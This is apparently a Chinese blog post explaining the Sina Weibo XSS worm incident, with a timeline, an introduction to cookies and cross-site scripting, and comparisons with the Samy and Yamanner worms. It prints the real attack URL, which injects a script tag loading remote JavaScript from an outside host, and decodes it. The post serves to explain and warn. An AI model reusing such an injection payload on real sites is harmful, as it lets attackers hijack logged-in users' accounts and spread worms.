XSS攻擊事件的經(jīng)過(guò)線索

20:14，開始有大量帶V的認(rèn)證用戶中招轉(zhuǎn)發(fā)蠕蟲

20:30，2kt.cn中的病毒頁(yè)面無(wú)法訪問(wèn)

20:32，新浪微博中hellosamy用戶無(wú)法訪問(wèn)

21:02，新浪漏洞修補(bǔ)完畢

新浪微博XSS攻擊事件

在這里，想和大家介紹一下XSS攻擊，XSS攻擊又叫跨站腳本式攻擊，你Google一下可以搜到很多很多的文章。我在這里就簡(jiǎn)單地說(shuō)一下。

首先，我們都知道網(wǎng)上很多網(wǎng)站都可以“記住你的用戶名和密碼”或是“自動(dòng)登錄”，其實(shí)是在你的本地設(shè)置了一個(gè)cookie，這種方式可以讓你免去每次都輸入用戶名和口令的痛苦，但是也帶來(lái)很大的問(wèn)題。試想，如果某用戶在“自動(dòng)登錄”的狀態(tài)下，如果你運(yùn)行了一個(gè)程序，這個(gè)程序訪問(wèn)“自動(dòng)登錄”這個(gè)網(wǎng)站上一些鏈接、提交一些表單，那么，也就意味著這些程序不需要輸入用戶名和口令的手動(dòng)交互就可以和服務(wù)器上的程序通話。這就是XSS攻擊的最基本思路。

再說(shuō)一點(diǎn)，不一定是“記住你的用戶名和密碼”或是“自動(dòng)登錄”的方法，因?yàn)镠TTP是無(wú)狀態(tài)的協(xié)議，所以，幾乎所有的網(wǎng)站都會(huì)在你的瀏覽器上設(shè)置cookie來(lái)記錄狀態(tài)，以便在其多個(gè)網(wǎng)頁(yè)切換中檢查你的登錄狀態(tài)。而現(xiàn)在的瀏覽器的運(yùn)行方式是多頁(yè)面或多窗口運(yùn)行，也就是說(shuō)，你在同一個(gè)父進(jìn)程下開的多個(gè)頁(yè)面或窗口里都可以無(wú)償和共享使用你登錄狀態(tài)的。

當(dāng)然，你不必過(guò)于擔(dān)心訪問(wèn)別的網(wǎng)站，在別的網(wǎng)站里的js代碼會(huì)自動(dòng)訪問(wèn)你的微博或是網(wǎng)銀。因?yàn)闉g覽器的安全性讓js只能訪問(wèn)自己所在網(wǎng)站的資源（你可以引入其它網(wǎng)站的js）。當(dāng)然，這是瀏覽器對(duì)js做的檢查，所以，瀏覽器并不一定會(huì)做這個(gè)檢查，這就是為什么IE6是史上最不安全的瀏覽器，沒(méi)有之一。只要你沒(méi)有在用IE6，應(yīng)該沒(méi)有這些問(wèn)題。

XSS攻擊有兩種方法

一種就像SQL Injection或CMD Injection攻擊一樣，我把一段腳本注入到服務(wù)器上，用戶訪問(wèn)方法服務(wù)器的某個(gè)URL，這個(gè)URL就會(huì)把遠(yuǎn)端的js注入進(jìn)來(lái)，這個(gè)js有可能自動(dòng)進(jìn)行很多操作。比如這次事件中的幫你發(fā)微博，幫你發(fā)站內(nèi)消息等。注入有很多方法，比如：提交表單，更改URL參數(shù)，上傳圖片，設(shè)置簽名，等等。

另一類則是來(lái)來(lái)自外部的攻擊，主要指的自己構(gòu)造XSS 跨站漏洞網(wǎng)頁(yè)或者尋找非目標(biāo)機(jī)以外的有跨站漏洞的網(wǎng)頁(yè)。如當(dāng)我們要滲透一個(gè)站點(diǎn)，我們自己構(gòu)造一個(gè)跨站網(wǎng)頁(yè)放在自己的服務(wù)器上，然后通過(guò)結(jié)合其它技術(shù)，如 社會(huì)工程學(xué)等，欺騙目標(biāo)服務(wù)器的管理員打開。這一類攻擊的威脅相對(duì)較低，至少ajax 要發(fā)起跨站調(diào)用是非常困難的（你可能需要hack瀏覽器）。

這次新浪微博事件是第一種，其利用了微博廣場(chǎng)頁(yè)面 http://weibo.com/pub/star 的一個(gè)URL注入了js腳本，其通過(guò)http://163.fm/PxZHoxn短鏈接服務(wù)，將鏈接指向：http://weibo.com/pub/star/g/xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/images/t.js%3E%3C/script%3E?type=update

注意，上面URL鏈接中的其實(shí)就是<script src=//www.2kt.cn/images/t.js></script>。攻擊者并不一定是2kt.cn的人，因?yàn)?cn被國(guó)家嚴(yán)格管制（大家不知道coolshell.cn 的備案?jìng)淞瞬恢卸嗌俅危?，我個(gè)人覺(jué)得這個(gè)人不會(huì)愚蠢到用自己域名來(lái)做攻擊服務(wù)器。

XSS攻擊其它分析

初步發(fā)現(xiàn) Chrome 和 Safari 都沒(méi)中招。IE、Firefox未能幸免。史上最著名的XSS攻擊是Yahoo Mail 的Yamanner 蠕蟲是一個(gè)著名的XSS 攻擊實(shí)例。早期Yahoo Mail 系統(tǒng)可以執(zhí)行到信件內(nèi)的javascript 代碼。并且Yahoo Mail 系統(tǒng)使用了Ajax技術(shù)，這樣病毒javascript 可以的向Yahoo Mail 系統(tǒng)發(fā)起ajax 請(qǐng)求，從而得到用戶的地址簿，并發(fā)送攻擊代碼給他人。

為什么那個(gè)用戶叫hellosamy，因?yàn)閟amy是第一個(gè)XSS攻擊性的蠕蟲病毒，在MySpace上傳播。

新浪微博XSS攻擊的代碼在這里：06.28_sina_XSS.txt （編碼風(fēng)格還是很不錯(cuò)的），請(qǐng)網(wǎng)民在微博娛樂(lè)的同時(shí)要注意安全問(wèn)題。